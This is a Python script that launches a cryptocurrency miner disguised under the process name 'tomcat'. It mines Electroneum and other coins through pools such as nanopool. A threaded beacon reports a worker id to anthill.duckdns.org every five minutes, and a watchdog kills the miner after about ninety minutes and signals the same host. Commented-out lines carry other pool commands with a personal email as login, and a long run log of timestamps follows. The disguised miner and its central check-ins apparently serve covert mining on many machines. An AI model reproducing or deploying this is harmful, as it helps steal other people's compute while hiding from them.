import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:06.076542
#2018-02-17 16:59:02.212490
#2018-02-17 18:47:05.245611
#2018-02-17 20:36:03.697573
#2018-02-17 22:22:05.434150
#2018-02-18 00:06:01.818418
#2018-02-18 01:56:05.354435
#2018-02-18 03:44:05.137048
#2018-02-18 05:30:07.643259
#2018-02-18 07:22:05.928317
#2018-02-18 09:10:08.896156
#2018-02-18 10:56:04.952376
#2018-02-18 12:43:05.013919
#2018-02-18 14:30:09.033177
#2018-02-18 16:20:02.521678
#2018-02-18 18:08:04.976315
#2018-02-18 19:54:05.367993
#2018-02-18 21:41:05.085788
#2018-02-18 23:29:05.377692
#2018-02-19 01:16:03.670463
#2018-02-19 03:02:07.582702
#2018-02-19 04:47:03.433497
#2018-02-19 06:32:04.025578
#2018-02-19 08:21:01.247009
#2018-02-19 10:11:07.145870
#2018-02-19 11:59:09.098963
#2018-02-19 13:46:01.766938
#2018-02-19 15:35:07.765862
#2018-02-19 17:22:06.387224
#2018-02-19 19:10:01.268141
#2018-02-19 20:56:05.535120
#2018-02-19 22:44:02.110249
#2018-02-20 00:27:06.758125
#2018-02-20 02:15:04.155598
#2018-02-20 04:07:07.507986
#2018-02-20 05:50:05.752351
#2018-02-20 07:36:07.943563
#2018-02-20 09:21:07.332295
#2018-02-20 11:05:05.552645
#2018-02-20 12:52:01.717792
#2018-02-20 14:38:07.757802
#2018-02-20 16:23:07.358947
#2018-02-20 18:10:10.268636
#2018-02-20 20:02:04.177176
#2018-02-20 21:48:01.383399
#2018-02-20 23:32:03.652630
#2018-02-21 01:16:06.095142
#2018-02-21 03:04:06.363385
#2018-02-21 04:50:08.037156
#2018-02-21 06:38:06.671765
#2018-02-21 08:24:05.563078
#2018-02-21 10:09:01.312051
#2018-02-21 11:57:09.659901
#2018-02-21 13:47:08.097847
#2018-02-21 15:29:04.491048
#2018-02-21 17:19:05.011394
#2018-02-21 19:09:04.718663
#2018-02-21 20:55:10.257601
#2018-02-21 22:43:04.603887
#2018-02-22 00:31:08.159386
#2018-02-22 02:19:06.091231
#2018-02-22 04:06:02.280432
#2018-02-22 05:50:08.332650
#2018-02-22 07:35:03.147563
#2018-02-22 09:23:04.499812
#2018-02-22 11:09:04.430647
#2018-02-22 12:55:09.116188
#2018-02-22 14:43:01.590513
#2018-02-22 16:28:02.060872
#2018-02-22 18:16:10.095403
#2018-02-22 20:08:01.657921
#2018-02-22 21:55:01.444604
#2018-02-22 23:44:06.666689
#2018-02-23 01:33:04.237189
#2018-02-23 03:19:07.794633
#2018-02-23 05:05:03.888208
#2018-02-23 06:49:01.412837
#2018-02-23 08:39:06.499230
#2018-02-23 10:53:06.088331
#2018-02-23 12:50:08.767260
#2018-02-23 14:35:04.115416
#2018-02-23 16:24:05.631157
#2018-02-23 18:10:03.588125
#2018-02-23 19:54:03.813338
#2018-02-23 21:39:02.113215
#2018-02-23 23:33:07.364157
#2018-02-24 01:24:04.714400
#2018-02-24 03:15:08.399470
#2018-02-24 05:01:06.355459
#2018-02-24 06:49:06.921186
#2018-02-24 08:41:05.855688
#2018-02-24 10:25:07.516558
#2018-02-24 12:20:03.765174
#2018-02-24 14:13:07.267782
#2018-02-24 16:00:10.046458
#2018-02-24 17:52:06.221718
#2018-02-24 19:39:05.816012
#2018-02-24 21:26:04.494976
#2018-02-25 00:09:01.532006
#2018-02-25 04:06:06.239348
#2018-02-25 07:38:01.416673